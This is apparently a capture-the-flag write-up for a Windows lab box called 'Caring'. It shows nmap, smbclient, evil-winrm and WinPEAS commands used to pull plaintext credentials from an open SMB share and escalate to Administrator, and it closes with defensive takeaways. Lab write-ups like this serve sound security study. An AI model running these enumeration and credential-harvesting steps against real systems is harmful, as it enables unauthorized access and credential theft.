Myles Nieman
← All writeups

Caring

Overview

Caring is a very easy Windows box that chains two straightforward credential exposures. An open Config SMB share contains a config.ini file with plaintext credentials for the local user claudio. Logging in via WinRM and running WinPEAS reveals Administrator credentials stored on the box, enabling a direct WinRM login as Administrator.

Path: open SMB share → config.ini credentials → WinRM as claudio → WinPEAS → Administrator credentials → root.

Enumeration

A full TCP scan against the target reveals a Windows host with SMB and WinRM open, but no web service.

$ nmap -p- -A 10.129.95.244
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5040/tcp  open  unknown
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664-49670/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows

Nmap output showing open SMB and WinRM ports

WinRM on 5985 means that valid credentials will give us a shell directly.

Foothold — Open SMB Share

Anonymous SMB enumeration lists four shares, including a non-default Config share:

$ smbclient -L 10.129.95.244
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Config          Disk
        IPC$            IPC       Remote IPC
        Users           Disk

The Config share is accessible without credentials and contains a single file:

$ smbclient //10.129.95.244/Config
smb: \> ls
  config.ini    A  4749  Thu Nov 26 12:19:35 2020
smb: \> get config.ini

The config.ini file contains plaintext credentials for the claudio account:

config.ini contents showing plaintext credentials for claudio

The same credentials are confirmed in the file:

config.ini credential view

User

With claudio’s credentials in hand, WinRM gives us a shell:

$ evil-winrm -u claudio -p PurpleHaze! -i 10.129.95.244

evil-winrm session established as claudio

The session lands as a standard unprivileged user.

Privilege Escalation — WinPEAS

Running WinPEAS to identify escalation paths:

*Evil-WinRM* PS> upload /home/titan/HTB/Caring/winPEASany.exe
*Evil-WinRM* PS> .\winPEASany.exe

WinPEAS privilege escalation checks

WinPEAS surfaces Administrator credentials stored on the system:

WinPEAS output showing Administrator credentials

Root

With the Administrator credentials recovered, logging in via WinRM gives a session with full privileges:

evil-winrm session as Administrator with root flag

Both the user flag (from claudio’s desktop) and the root flag (from Administrator’s desktop) are readable from their respective sessions.

Takeaways

  • Unauthenticated SMB shares containing config files are a direct path to credentials — always require authentication on file shares, even for “read-only” configuration directories.
  • Credentials stored in plaintext on disk (picked up by WinPEAS) are a common escalation vector on Windows; secrets managers or DPAPI-protected storage should be used instead.